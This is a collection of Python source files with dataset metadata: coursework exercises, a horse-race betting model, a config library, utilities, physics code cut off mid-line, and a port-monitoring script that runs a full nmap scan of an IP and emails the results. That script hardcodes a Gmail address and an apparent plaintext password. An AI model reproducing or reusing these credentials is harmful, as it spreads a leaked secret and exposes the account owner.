a4\r\n\r\n#(c)\r\nb1=set((1,2,3,4,5,6,7)) #take a set b1\r\nb2=set((2,4,7,9)) #take set b2\r\nb3=b1&b2 #take intersetion of two sets\r\nprint(b3) #print the interrsetion set\r\nprint(\"this is the intersection set\") #print\r\nb4=b1|b2 #take union of two sets\r\nprint(b4) #print the union of set\r\nprint(\"this is the unoin set\") #print\r\n\r\n#Q5\r\na=input(\"enter the name\") #enter the name you want\r\nb=input(\"enter marks\") #enter the marks\r\nd={'name':'a','marks':'b'} #make a dicitionary d\r\nprint(d) #print the dictionary\r\n#Q6\r\n\r\n\r\n#Q7\r\nl=('mississippi') #take a tupil which contains a sting in which there is a repeation of same letters\r\ncheck_for_m=l.count('m') #count the number of m\r\ncheck_for_i=l.count('i') #count the number of i\r\ncheck_for_s=l.count('s') #count the number of s\r\ncheck_for_p=l.count('p') #count the number of p\r\nd={'number of m':check_for_m,'number of i':check_for_i,'number of s':check_for_s,'number of p':check_for_p}\r\nprint(d) #print the dictionary d\r\n","sub_path":"assingnment_4.py","file_name":"assingnment_4.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"26472692","text":"# -*- coding:utf-8 -*-\n\n#\n#Let us pray the success of experiments\n#\n\nfrom keras.regularizers import l1,l2\nfrom keras.models import Sequential,Model,load_model\nfrom keras.layers import Dense,Activation,Input,Dropout,Concatenate,Conv2D,Add,ZeroPadding2D,GaussianNoise\nfrom keras.models import model_from_config\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.layers.core import Reshape,Flatten,Permute,Lambda\nfrom keras.layers.pooling import GlobalAveragePooling2D,GlobalMaxPooling2D\nimport keras.optimizers\nimport numpy as np\nimport pandas as pd\nimport sqlite3, pickle,argparse,sys,random\nimport dataset2, util, evaluate\nimport place2vec, course2vec,field_fitness\nimport mutual_preprocess\n\n\nEVALUATE_INTERVAL = 10\nMAX_ITERATION = 50000\nBATCH_SIZE = 36\nREFRESH_INTERVAL = 50 \nPREDICT_TYPE = \"win_payoff\"\n#PREDICT_TYPE = \"place_payoff\"\nMODEL_PATH = \"./models/montecarlo.h5\"\nMEAN_PATH = \"./models/montecarlo.pickle\"\nSTD_PATH = \"./models/montecarlo.pickle\"\nCACHE_PATH = \"./cache/montecarlo\"\n\npd.set_option('display.height', 1000)\npd.set_option('display.width', 1000)\npd.set_option('display.max_rows', 1000)\npd.set_option('display.max_columns', 1000)\nnp.set_printoptions(threshold=np.nan)\n \ndef main(use_cache = False):\n #predict_type = \"place_payoff\"\n predict_type = PREDICT_TYPE\n config = util.get_config(\"config/config.json\")\n db_path = \"db/output_v12.db\"\n\n db_con = sqlite3.connect(db_path)\n if use_cache:\n print(\"[*] load dataset from cache\")\n datasets = dataset2.load_cache(CACHE_PATH)\n else:\n datasets = generate_dataset(predict_type,db_con,config)\n dnn(config.features,datasets)\n\ndef generate_dataset(predict_type,db_con,config):\n print(\"[*] preprocessing step\")\n print(\">> loading dataset\")\n main_features = config.features\n additional_features = [\"linfo_win_odds\",\"linfo_place_odds\"]\n load_features = main_features + additional_features\n x,p2v,y = mutual_preprocess.load_datasets_with_p2v(db_con,load_features)\n main_features = main_features + [\"info_race_id\"]\n\n additional_x = x.loc[:,additional_features]\n x = x.loc[:,main_features]\n\n col_dic = dataset2.nominal_columns(db_con)\n nom_col = dataset2.dummy_column(x,col_dic)\n x = dataset2.get_dummies(x,col_dic)\n\n main_features = sorted(x.columns.values.tolist())\n main_features_dropped = sorted(x.columns.drop(\"info_race_id\").values.tolist())\n additional_features = sorted(additional_x.columns)\n p2v_features = sorted(p2v.columns.values.tolist())\n\n x = concat(x,p2v)\n x = dataset2.downcast(x)\n del p2v\n\n print(\">> separating dataset\")\n con = concat(x,additional_x)\n train_con,test_con,train_y,test_y = dataset2.split_with_race(con,y,test_nums = 1000)\n train_x = train_con.loc[:,x.columns]\n train_add_x = train_con.loc[:,additional_x.columns]\n test_x = test_con.loc[:,x.columns]\n test_add_x = test_con.loc[:,additional_x.columns]\n train_x = dataset2.downcast(train_x)\n\n test_x = dataset2.downcast(test_x)\n del x,y,con,train_con,test_con\n \n print(\">> filling none value of datasets\")\n mean = train_x.mean(numeric_only = True)\n std = train_x.std(numeric_only = True).clip(lower = 1e-2)\n mean_odds = train_add_x.mean(numeric_only = True)\n #mean_std = train_add_x.std(numeric_only = True).clip(lower = 1e-2)\n save_value(mean,MEAN_PATH)\n save_value(std,STD_PATH)\n\n train_x = fillna_mean(train_x,mean)\n train_add_x = fillna_mean(train_add_x,mean_odds)\n test_x = fillna_mean(test_x,mean)\n test_add_x = fillna_mean(test_add_x,mean_odds)\n\n print(\">> normalizing datasets\")\n train_x = dataset2.normalize(train_x,mean = mean,std = std,remove = nom_col)\n test_x = dataset2.normalize(test_x,mean = mean,std = std,remove = nom_col)\n train_add_x = (train_add_x/100.0).clip(upper = 50)\n test_add_x = (test_add_x/100.0).clip(upper = 50)\n\n print(\">> adding extra information to datasets\")\n train_x,train_y = add_c2v(train_x,train_y,main_features_dropped,nom_col)\n test_x,test_y = add_c2v(test_x,test_y,main_features_dropped,nom_col)\n train_x,train_y = add_ff(train_x,train_y,main_features_dropped,nom_col)\n test_x,test_y = add_ff(test_x,test_y,main_features_dropped,nom_col)\n\n print(\">> generating target variable\")\n train_y[\"is_win\"] = train_y[\"win_payoff\"].clip(lower = 0,upper = 1)\n train_y[\"is_place\"] = train_y[\"place_payoff\"].clip(lower = 0,upper = 1)\n test_y[\"is_win\"] = test_y[\"win_payoff\"].clip(lower = 0,upper = 1)\n test_y[\"is_place\"] = test_y[\"place_payoff\"].clip(lower = 0,upper = 1)\n\n print(\">> converting train dataset to race panel\")\n features = sorted(train_x.columns.drop(\"info_race_id\").values.tolist())\n train_x,train_y,train_add_x = dataset2.pad_race(train_x,train_y,train_add_x)\n test_x,test_y,test_add_x = dataset2.pad_race(test_x,test_y,test_add_x)\n train_x = dataset2.downcast(train_x)\n train_y = dataset2.downcast(train_y)\n train_x,train_y,train_add_x = dataset2.to_race_panel(train_x,train_y,train_add_x)\n test_x,test_y,test_add_x = dataset2.to_race_panel(test_x,test_y,test_add_x)\n\n train_x = train_x.loc[:,:,features]\n train_add_x = train_add_x.loc[:,:,additional_features]\n train_y = train_y.loc[:,:,[\"place_payoff\",\"win_payoff\",\"is_win\",\"is_place\"]]\n test_x = test_x.loc[:,:,features]\n test_add_x = test_add_x.loc[:,:,additional_features]\n test_y = test_y.loc[:,:,[\"place_payoff\",\"win_payoff\",\"is_win\",\"is_place\"]]\n\n print(\">> prediting with dnn \")\n train_race_idx = train_x.axes[0]\n test_race_idx = test_x.axes[0]\n train_x = train_x.as_matrix()\n test_x = test_x.as_matrix()\n pred_model = load_model(\"./models/mlp_model3.h5\")\n\n train_x = pred_model.predict(train_x)\n train_x = pd.Panel({\"pred\":pd.DataFrame(train_x,index = train_race_idx)})\n train_x = train_x.swapaxes(0,1,copy = False)\n train_x = train_x.swapaxes(1,2,copy = False)\n train_x = pd.concat([train_x,train_add_x],axis = 2)\n\n test_x = pred_model.predict(test_x)\n test_x = pd.Panel({\"pred\":pd.DataFrame(test_x,index = test_race_idx)})\n test_x = test_x.swapaxes(0,1,copy = False)\n test_x = test_x.swapaxes(1,2,copy = False)\n test_x = pd.concat([test_x,test_add_x],axis = 2)\n print(train_x.shape)\n print(test_x.shape)\n\n datasets = {\n \"train_x\" : train_x,\n \"train_y\" : train_y,\n \"test_x\" : test_x,\n \"test_y\" : test_y,\n }\n dataset2.save_cache(datasets,CACHE_PATH)\n return datasets\n\ndef dnn(features,datasets):\n print(\"[*] training step\")\n target_y = \"place_payoff\"\n target_y = \"win_payoff\"\n train_x = datasets[\"train_x\"]\n train_y = datasets[\"train_y\"].loc[:,:,[target_y]] -100\n test_x = datasets[\"test_x\"].as_matrix()\n #test_y = datasets[\"test_y\"].loc[:,:,target_y].as_matrix().reshape([18,-1]).T-100\n test_y = datasets[\"test_y\"].loc[:,:,target_y].as_matrix()-100\n test_y = test_y.reshape([-1,18],order='F')\n \n max_iterate = 300000\n log_interval = 5\n model_swap_interval = 5\n model = create_model()\n old_model = clone_model(model)\n sampler = ActionSampler(train_x,train_y)\n \n pre_x = None\n pre_y = None\n for i in range(max_iterate):\n target_size = 5\n batch_size = 300\n x,y,act = sampler.get_sample(old_model,target_size,batch_size)\n model.fit(x,act,epochs = 1,batch_size = batch_size,verbose = 0)\n if i%log_interval == 0:\n log(i,model,x,y)\n log(i,model,test_x,test_y)\n if pre_x is not None:\n log(i,model,pre_x,pre_y)\n pre_x = x\n pre_y = y\n #print(pre_y.shape)\n if i%model_swap_interval == 0:\n print(\"swap\")\n old_model = clone_model(model)\n\nclass ActionSampler():\n\n def __init__(self,x,y,max_sampling = 1000):\n self.max_sampling = max_sampling\n self.x = x\n self.y = y\n self.con = pd.concat([self.x,self.y],axis = 2)\n\n self.x_col = x.axes[2].tolist()\n self.y_col = y.axes[2].tolist()\n self.y.axes[0] = self.x.axes[0]\n self.y.axes[1] = self.x.axes[1]\n \n def get_sample(self,model,target_size,batch_size):\n timeout = 10000\n sample_list_x = []\n sample_list_y = []\n sample_list_act = []\n for i in range(timeout):\n x,y = self.__random_sample(target_size)\n pred = model.predict(x)\n pred_act = np.round(pred)\n pred_value = eval_action(pred_act,y,target_size)\n\n best_value = pred_value\n best_act = pred_act\n should_push = False\n hit_count = 1.0\n for j in range(self.max_sampling):\n random_act = self.__generate_action(pred)\n eval_value = eval_action(random_act,y,target_size)\n if eval_value > best_value:\n best_value = eval_value\n best_act += random_act\n #best_act = random_act\n hit_count += 1\n should_push = True\n if should_push:\n best_act = best_act/hit_count\n sample_list_x.append(x)\n sample_list_y.append(y)\n sample_list_act.append(best_act)\n else:\n pass\n now_len = len(sample_list_x) * target_size\n if now_len >= batch_size:\n break\n ret_x = np.concatenate(sample_list_x,axis = 0)\n ret_y = np.concatenate(sample_list_y,axis = 0)\n ret_act = np.concatenate(sample_list_act,axis = 0)\n return (ret_x,ret_y,ret_act)\n\n def __generate_action(self,pred):\n pred_act = np.round(pred)\n dice = random.random()\n if dice < 0.2:\n random_act = np.random.randint(2,size = pred.shape)\n #random_act = random_inverts(0.03,pred_act)\n #max_value = 10000.0\n #prob = max((max_value-i)/max_value, 5e-2)\n #random_act = random_inverts(prob,pred_act)\n elif dice < 0.4:\n random_act = random_inverts(0.03,pred_act)\n else:\n #noise = (float(j)/max_iterate)/3\n noise = 0.1\n n_pred = np.clip(pred,noise,0.99-noise)\n random_act = np.random.binomial(1,n_pred)\n return random_act\n\n def __random_sample(self,batch_size):\n sample = self.con.sample(n = batch_size,axis = 0)\n x = sample.loc[:,:,self.x_col]\n y = sample.loc[:,:,self.y_col]\n\n x = x.as_matrix()\n y = y.as_matrix()\n y = y.reshape([-1,18],order='F')\n return (x,y)\n\n\ndef eval_action(action,payoff,batch_size):\n buy = np.sum(action)\n reward_matrix = action*payoff\n #hit_matrix = np.clip(reward_matrix,0,1)\n total_reward = np.sum(reward_matrix)\n #total_hit = np.sum(hit_matrix)\n reward_per = total_reward/buy if buy != 0 else 0\n #hit_per = total_hit/batch_size\n return max(reward_per,0.0)\n #return max(total_reward,0.0)\n\ndef log(epoch,model,x,y):\n pred = model.predict(x)\n pred_act = np.round(pred)\n reward_matrix = pred_act*y\n hit_matrix = np.clip(reward_matrix,0,1)\n total_hit = np.sum(hit_matrix)\n total_reward = np.sum(reward_matrix)\n buy = np.sum(pred_act)\n reward_per = float(total_reward/buy)\n print(\"Epoch {0}, Hit : {1}/{2}, Reward Per : {3}, Total Reward : {4}\".format(epoch,total_hit,buy,reward_per,total_reward))\n\n\ndef create_model(activation = \"relu\",dropout = 0.4,hidden_1 = 80,hidden_2 = 80,hidden_3 = 80):\n l2_coef = 0.01\n feature_size = 3\n inputs = Input(shape = (18,3))\n x = inputs\n\n \"\"\"\n x = Reshape([18,feature_size,1],input_shape = (feature_size*18,))(x)\n x = Conv2D(32,(1,3),padding = \"valid\",kernel_initializer=\"he_normal\",kernel_regularizer = l2(l2_coef))(x)\n x = Activation(activation)(x)\n x = BatchNormalization(momentum = 0)(x)\n x = Dropout(0.5)(x)\n\n x = Conv2D(32,(1,1),padding = \"valid\",kernel_initializer=\"he_normal\",kernel_regularizer = l2(l2_coef))(x)\n x = Activation(activation)(x)\n x = BatchNormalization(momentum = 0)(x)\n x = Dropout(0.5)(x)\n\n\n x = Conv2D(1,(1,1),padding = \"valid\",kernel_initializer=\"he_normal\",kernel_regularizer = l2(l2_coef))(x)\n x = Flatten()(x)\n\n \"\"\"\n x = Flatten()(inputs)\n #x = GaussianNoise(0.01)(x)\n\n x = Dense(units = 36,kernel_regularizer = l2(l2_coef))(x)\n #x = Activation(activation)(x)\n x = BatchNormalization(momentum = 0)(x)\n x = Dropout(0.6)(x)\n\n x = Dense(units = 18,kernel_regularizer = l2(l2_coef),bias_regularizer = l2(l2_coef))(x)\n outputs = Activation(\"sigmoid\")(x)\n\n model = Model(inputs = inputs,outputs = outputs)\n opt = keras.optimizers.Adam(lr=1e-2)\n #opt = keras.optimizers.SGD(lr=1e-1)\n #model.compile(loss = \"binary_crossentropy\",optimizer=opt,metrics=[\"accuracy\"])\n model.compile(loss = \"mse\",optimizer=opt,metrics=[\"accuracy\"])\n #model.compile(loss = \"categorical_crossentropy\",optimizer=opt,metrics=[\"accuracy\"])\n return model\n\ndef save_model(model,path):\n print(\"Save model\")\n model.save(path)\n\ndef save_value(v,path):\n with open(path,\"wb\") as fp:\n pickle.dump(v,fp)\n\ndef load_value(path):\n with open(path,\"rb\") as fp:\n v = pickle.load(fp)\n return v\n raise Exception (\"File does not exist\")\n\ndef to_descrete(array):\n res = np.zeros_like(array)\n res[array.argmax(1)] = 1\n return res\n\ndef concat(a,b):\n a.reset_index(inplace = True,drop = True)\n b.reset_index(inplace = True,drop = True)\n return pd.concat([a,b],axis = 1)\n\ndef add_c2v(x,y,features,nom_col):\n c2v_x = x.loc[:,features]\n c2v_df = course2vec.get_vector(c2v_x,nom_col)\n x = concat(x,c2v_df)\n y.reset_index(inplace = True,drop = True)\n del c2v_x\n del c2v_df\n return (x,y)\n\ndef add_ff(x,y,features,nom_col):\n ff_x = x.loc[:,features]\n ff_df = field_fitness.get_vector(ff_x,nom_col)\n x = concat(x,ff_df)\n y.reset_index(drop = True,inplace = True)\n del ff_x\n del ff_df\n return (x,y)\n\ndef fillna_mean(df,mean = None):\n if type(mean) == type(None):\n mean = df.mean(numeric_only = True)\n df = df.fillna(mean)\n else:\n df = df.fillna(mean)\n return df\n\ndef drange(begin, end, step):\n n = begin\n while n+step < end:\n yield n\n n += step\n\ndef random_inverts(p,matrix):\n matrix = matrix.astype(bool)\n random_mask = np.random.binomial(1,p,size = matrix.shape).astype(bool)\n random_value = np.random.randint(2,size = matrix.shape)\n ret = np.where(random_mask == True,random_value,matrix).astype(np.int32)\n return ret\n\ndef clone_model(model,custom_objects = {}):\n config = {\n 'class_name': model.__class__.__name__,\n 'config': model.get_config(),\n }\n clone = model_from_config(config, custom_objects=custom_objects)\n clone.set_weights(model.get_weights())\n return clone\n\n\nif __name__==\"__main__\":\n \"\"\"\n array = np.array([1,1,1,1,0,0,0,0])\n for i in range(10):\n print(random_inverts(0.9,array))\n \"\"\"\n parser = argparse.ArgumentParser(description=\"horse race result predictor using multilayer perceptron\")\n parser.add_argument(\"-c\",\"--cache\",action=\"store_true\",default=False)\n args = parser.parse_args()\n main(use_cache = args.cache)\n\n","sub_path":"trash/selfplay.py","file_name":"selfplay.py","file_ext":"py","file_size_in_byte":15250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"54141883","text":"# coding: utf-8\nimport os\nimport sys\n\n\n# Useful for very coarse version differentiation.\nPY3 = sys.version_info[0] == 3\n\nif PY3:\n from configparser import ConfigParser\n string_type = str\n string_empty = ''\nelse:\n from ConfigParser import SafeConfigParser as ConfigParser\n string_type = unicode\n string_empty = u''\n\n\nclass ConfigBase(object):\n \"\"\"\n Base class to make the API explicit.\n \"\"\"\n def __init__(self, config_file):\n raise NotImplemented\n\n def get(self, option, default=string_empty, cast=string_type):\n \"\"\"\n Return the value for option or default option is not defined.\n \"\"\"\n raise NotImplemented\n\n def __call__(self, *args, **kwargs):\n \"\"\"\n Convenient shortcut to get.\n \"\"\"\n return self.get(*args, **kwargs)\n\n\nclass ConfigIni(ConfigBase):\n \"\"\"\n Wrapper around ConfigParser to deal with Django environment settings.\n \"\"\"\n SECTION = 'settings'\n\n def __init__(self, config_file):\n self.config_file = None\n self.parser = None\n self.load(config_file)\n\n def load(self, config_file):\n \"\"\"\n Load config data from a file.\n \"\"\"\n self.config_file = config_file\n self.parser = ConfigParser()\n self.parser.readfp(open(config_file))\n\n def get(self, option, default=string_empty, cast=string_type):\n \"\"\"\n Return the value for option or default option is not defined.\n \"\"\"\n if not self.parser.has_option(self.SECTION, option):\n return cast(default)\n\n getter = {\n bool: self.parser.getboolean,\n float: self.parser.getfloat,\n int: self.parser.getint,\n }.get(cast, self.parser.get)\n\n return cast(getter(self.SECTION, option))\n\n def set(self, option, value):\n \"\"\"\n Add a config value to configuration instance.\n \"\"\"\n if not self.parser.has_section(self.SECTION):\n self.parser.add_section(self.SECTION)\n\n self.parser.set(self.SECTION, option, string_type(value))\n\n def remove(self, option):\n \"\"\"\n Remove an option from the config instance.\n \"\"\"\n return self.parser.remove_option(self.SECTION, option)\n\n def list(self):\n \"\"\"\n Return a list of all (option, value) pairs.\n \"\"\"\n return self.parser.items(self.SECTION)\n\n def save(self):\n \"\"\"\n Persist current configuration instance to the original config file.\n \"\"\"\n with open(self.config_file, 'wb') as f:\n self.parser.write(f)\n\n\nclass ConfigEnv(ConfigBase):\n \"\"\"\n Handle .env file format used by Foreman.\n \"\"\"\n _BOOLEANS = {'1': True, 'yes': True, 'true': True, 'on': True,\n '0': False, 'no': False, 'false': False, 'off': False}\n\n def __init__(self, config_file):\n self.data = self._read_dotenv(config_file)\n\n def _read_dotenv(self, config_file):\n \"\"\"\n Read config data from a file. Taken from jacobian's django-dotenv\n \"\"\"\n data = {}\n for line in open(config_file):\n line = line.strip()\n if not line or line.startswith('#') or '=' not in line:\n continue\n k, v = line.split('=', 1)\n v = v.strip(\"'\").strip('\"')\n data[k] = v\n return data\n\n def _cast_boolean(self, value):\n \"\"\"\n Helper to convert config values to boolean as ConfigParser do.\n \"\"\"\n if value.lower() not in self._BOOLEANS:\n raise ValueError('Not a boolean: %s' % value)\n\n return self._BOOLEANS[value.lower()]\n\n def get(self, option, default=string_empty, cast=string_type):\n \"\"\"\n Return the value for option or default option is not defined.\n \"\"\"\n if option not in self.data and \\\n option not in os.environ:\n # If default was not defined return it, else make sure to cast.\n # This is usefull for cases like dj-database-url.parse.\n if default == string_empty:\n return default\n else:\n return cast(default)\n\n if cast is bool:\n cast = self._cast_boolean\n\n return cast(self.data.get(option) or os.environ[option])\n\n\nclass AutoConfig(object):\n \"\"\"\n Autodetects the config file and type.\n \"\"\"\n SUPPORTED = {\n 'settings.ini': ConfigIni,\n '.env': ConfigEnv,\n }\n\n def __init__(self):\n self.config = None\n\n def _find_file(self, path):\n # look for all files in the current path\n for filename in self.SUPPORTED:\n file = os.path.join(path, filename)\n if os.path.exists(file):\n return file\n\n # search the parent\n parent = os.path.dirname(path)\n if parent and parent != os.path.sep:\n return self._find_file(parent)\n\n # reached root without finding any files.\n raise RuntimeError(\"No supported config file found.\")\n\n def _load(self, path):\n file = self._find_file(path)\n klass = self.SUPPORTED.get(os.path.basename(file))\n self.config = klass(file)\n\n def _caller_path(self):\n # MAGIC! Get the caller's module path.\n frame = sys._getframe()\n path = os.path.dirname(frame.f_back.f_back.f_code.co_filename)\n return path\n\n def __call__(self, *args, **kwargs):\n if not self.config:\n self._load(self._caller_path())\n\n return self.config(*args, **kwargs)\n\n\n# A pré-instantiated AutoConfig to improve decouple's usability\n# now just import config and start using with no configuration.\nconfig = AutoConfig()\n","sub_path":"venv/lib/python3.6/site-packages/decouple.py","file_name":"decouple.py","file_ext":"py","file_size_in_byte":5677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"640498723","text":"import math\nimport datetime as dt\nimport numbers\n\n\ndef is_a_digit(char):\n \"\"\"\n Check if the provided character is a digit.\n Returns a boolean result.\n \"\"\"\n if (char == '0' or char == '1'\n or char == '2' or char == '3'\n or char == '4' or char == '5'\n or char == '6' or char == '7'\n or char == '8' or char == '9'):\n return True\n else:\n return False\n\n\ndef first_non_digit(string):\n \"\"\"\n Finds the first non-digit character in the provided string.\n Returns the location and the char.\n \"\"\"\n for i in range(len(string)):\n if not is_a_digit(string[i]):\n return [i, string[i]]\n return [-1, ' ']\n\n\ndef parse_date(datestring):\n \"\"\"\n Parses a date string into a datetime object.\n It expects no more than 2 digits for the day, and uses this\n to determine whether the format is dmy or ymd. The delimit\n character is automatically determined.\n Returns the datetime or None.\n \"\"\"\n [delimit_loc, delimit_char] = first_non_digit(datestring)\n if (delimit_loc < 3):\n formatter = \"%d\" + delimit_char + \"%m\" + delimit_char + \"%Y\"\n else:\n formatter = \"%Y\" + delimit_char + \"%m\" + delimit_char + \"%d\"\n answer = dt.datetime.strptime(datestring, formatter)\n return answer\n\n\ndef parse_value(valuestring):\n \"\"\"\n Parses a string to a float value. Whitespaces are parsed as nan.\n Returns a float.\n \"\"\"\n s = valuestring.strip()\n if (s == \"\"):\n s = \"nan\"\n return float(s)\n\n\ndef is_data_row(row):\n \"\"\"\n Guesses if a csvreader 'row' object contains data, i.e. not\n headder information. It does this by checking if the zeroth\n char of the zeroth element is a digit (which would be a date).\n Returns boolean result.\n \"\"\"\n if (not row or len(row) == 0):\n return False\n zeroth_element = row[0]\n if (len(zeroth_element) == 0):\n return False\n else:\n zeroth_char = zeroth_element[0]\n return is_a_digit(zeroth_char)\n\n\ndef count_missing(data):\n \"\"\"\n Counts the number of nan in a list of float.\n Return an integer.\n \"\"\"\n answer = 0\n for d in data:\n if math.isnan(d):\n answer = answer + 1\n return answer\n\n\ndef period_length(start_datetime, end_datetime, interval=dt.timedelta(1)):\n \"\"\"\n Calculates the number of intervals (default interval = 1 day) between\n two datetimes. The function returns the number of days as a float, which\n may be non-integer and/or negative.\n \"\"\"\n answer = (end_datetime - start_datetime) / interval\n return answer\n\n\ndef days_in_month(year, month):\n \"\"\"\n Calculates the number of days in a month. This is a bit hacky but doesn't\n require any new libraries and it works.\n \"\"\"\n date1 = dt.datetime(year, month, 1)\n date2 = None\n if month == 12:\n date2 = dt.datetime(year + 1, 1, 1)\n else:\n date2 = dt.datetime(year, month + 1, 1)\n answer = (date2 - date1).days\n return answer\n\n\ndef last_day_in_month(date):\n \"\"\"\n Returns a datetime set to the last day in the month\n \"\"\"\n x = days_in_month(date.year, date.month)\n answer = dt.datetime(date.year, date.month, x)\n return answer\n\n\ndef is_a_number(var):\n \"\"\"\n Tests if a variable is an instance of a numberself (i.e. int, float, etc)\n \"\"\"\n answer = isinstance(var, numbers.Number)\n return answer\n","sub_path":"pixiepython/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"558586226","text":"#!/usr/bin/env python3\n#./portmonitor.py 204.186.249.254 c20849936594ac95485e908ac9b984665ddd6aa6bbf616f4bbb8b6d5d10f915 mrjackson@gmail.com\nimport nmap #pip3 install python-nmap\nimport hashlib\nimport sys\nimport logging\nfrom logging.handlers import RotatingFileHandler\nfrom datetime import datetime\nfrom datetime import timedelta\n\nlogger = logging.getLogger(\"Rotating Log\")\nlogger.setLevel(logging.DEBUG)\nhandler = RotatingFileHandler(filename=\"/home/mrjackson/log/portmonitor.log\", maxBytes=1048576, backupCount=1)\nlogger.addHandler(handler)\nlogger.info(\"Script started: \" + str(datetime.now()) + \" -- Arguments -- \" + str(sys.argv[1:]))\nstarttime = str(datetime.now())\n\n\ntry:\n\thostip = str(sys.argv[1])\n\thash = str(sys.argv[2])\n\tcontact = str(sys.argv[3])\nexcept Exception as e:\n\tlogger.error(\"Script Failed: \" + str(datetime.now()) + \" -- Arguments Error -- \" + str(e))\n\tsys.exit(1)\n\n\ndef hash_string(string):\n\t#Return a SHA-256 hash of the given string\n\treturn hashlib.sha256(string.encode('utf-8')).hexdigest()\n\ndef sendalertmail(hostip,hash,porthash,portscan,recipient,starttime,endtime,subject):\n\t#print(hostip,hash,porthash)\n\timport smtplib\n\tfrom email.mime.multipart import MIMEMultipart\n\tfrom email.mime.text import MIMEText\n\n\tgmailUser = 'misterjackson.house@gmail.com'\n\tgmailPassword = 'bj002983mh1'\n#\trecipient = 'misterjackson.house@gmail.com'\n\tmessage=\"External Port Monitoring \\n\\n\" + hostip + \"\\nGood Hash: \" + hash + \"\\nCurrent Hash: \" + porthash + \" \\n\\n\" + portscan \\\n\t\t + \" \\n\\nStartTime: \" + starttime + \" \\nEndTime: \" + endtime\n\n\tmsg = MIMEMultipart()\n\tmsg['From'] = gmailUser\n\tmsg['To'] = recipient\n\tmsg['Subject'] = subject\n\tmsg.attach(MIMEText(message))\n\n\tmailServer = smtplib.SMTP('smtp.gmail.com', 587)\n\tmailServer.ehlo()\n\tmailServer.starttls()\n\tmailServer.ehlo()\n\tmailServer.login(gmailUser, gmailPassword)\n\tmailServer.sendmail(gmailUser, recipient, msg.as_string())\n\tmailServer.close()\n\ntry:\n\tnm = nmap.PortScanner()\n\tnm.scan(hosts=hostip, arguments='-Pn -r -p 1-65535 --scan-delay 15ms')\n\tfor host in nm.all_hosts():\n\t\tportscan = ('----------------------------------------------------\\n')\n\t\tportscan = portscan + ('Host : %s (%s)' % (host, nm[host].hostname())) + \"\\n\"\n\t\tportscan = portscan + ('State : %s' % nm[host].state()) + \"\\n\"\n\t\tfor proto in nm[host].all_protocols():\n\t\t\tportscan = portscan + ('----------') + \"\\n\"\n\t\t\tportscan = portscan + ('Protocol : %s' % proto) + \"\\n\"\n\n\t\t\tlport = nm[host][proto].keys()\n\t\t\t#lport.sort()\n\t\t\tfor port in lport:\n\t\t\t\tportscan = portscan + ('port : %s\\tstate : %s' % (port, nm[host][proto][port]['state'])) + \"\\n\"\n\t#print(portscan)\n\tporthash = hash_string(portscan)\n#\tprint(porthash)\n\n\tif (porthash != hash):\n\t\t#print(\"hash failed\")\n\t\tsubject = \"ALERT: External Port Monitoring \" + host\n#\t\tsendalertmail(hostip,hash,porthash,portscan,contact)\n\telse:\n\t\tsubject = \"INFO: External Port Monitoring \" + host\n\n\tlogger.info(portscan)\n\tlogger.info(\"Script finished: \" + str(datetime.now()) + \" -- \" + hostip + \" -- \" + porthash)\n\nexcept Exception as e:\n\tlogger.error(\"Script Failed: \" + str(datetime.now()) + \" -- Run Test -- \" + str(e))\n\tsys.exit(1)\n\nendtime = str(datetime.now())\nsendalertmail(hostip,hash,porthash,portscan,contact,starttime,endtime,subject)\n\n#print(portscan)\n#porthash = hash_string(portscan)\n#print(porthash)\n","sub_path":"portmonitor.py","file_name":"portmonitor.py","file_ext":"py","file_size_in_byte":3293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"301153635","text":"'''\n找出字符串中的最长子串的长度\n'''\n\n# 最长子字符串\ndef lengthOfLongestSubstring(s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n if len(s) <= 1:\n return len(s)\n a = []\n b = []\n for i in range(len(s)):\n a.append(s[i])\n for j in range(i+1, len(s)):\n if s[j] not in a:\n a.append(s[j])\n else:\n break\n b.append(a)\n a = []\n\n return max([len(x) for x in b])\nprint(lengthOfLongestSubstring('pwwkesiuhtgeirhpwijdkjdlkfnnlk2304920-35980945'))","sub_path":"第三题.py","file_name":"第三题.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"48811153","text":"import tensorflow as tf\n\nimport common\n\n\"\"\"\nCalculates the LJ potential force on particles\n pos: Tensor containing the position of particles in the shape [[x,y,z]]\n edges_half: Edges of the simulation box as a tensor in shape [x,y,z], divided by two\n neg_edges_half: Negation of Tensor `edges_half`\n edges: Edges of the simulation box as a tensor in shape [x,y,z]\n forces_zeroes_tf: A Tensor of all zeroes that matches shape with `pos`\n ljatom_diameter_tf: Tensor containing diameters of the particles, must match positions with `pos`\n\"\"\"\ndef lj_force(pos, edges_half, neg_edges_half, edges, forces_zeroes_tf, ljatom_diameter_tf):\n with tf.name_scope(\"lj_force\"):\n distances = tf.compat.v1.vectorized_map(fn=lambda atom_pos: pos - atom_pos, elems=pos)\n distances = tf.compat.v1.where_v2(distances > edges_half, distances - edges, distances, name=\"where_edges_half\")\n distances = tf.compat.v1.where_v2(distances < neg_edges_half, distances + edges, distances, name=\"where_neg_edges_half\")\n magnitude = common.magnitude(distances)\n twelve = tf.math.pow(ljatom_diameter_tf, 12.0, name=\"diam_12_pow\") / tf.math.pow(magnitude, 12.0, name=\"mag_12_pow\")\n six = tf.math.pow(ljatom_diameter_tf, 6.0, name=\"diam_6_pow\") / tf.math.pow(magnitude, 6.0, name=\"mag_6_pow\")\n mag_squared = 1.0 / tf.math.pow(magnitude,2, name=\"mag_sqr_pow\")\n slice_forces = distances * (48.0 * 1.0 * (((twelve - 0.5 * six) * mag_squared)))\n # handle case distances pos - atom_pos == 0, causing inf and nan to appear in that position\n # can't see a way to remove that case in all above computations, easier to do it all at once at the end\n filter = tf.math.logical_or(tf.math.is_nan(slice_forces), magnitude < (ljatom_diameter_tf*2.5), name=\"or\")\n filtered = 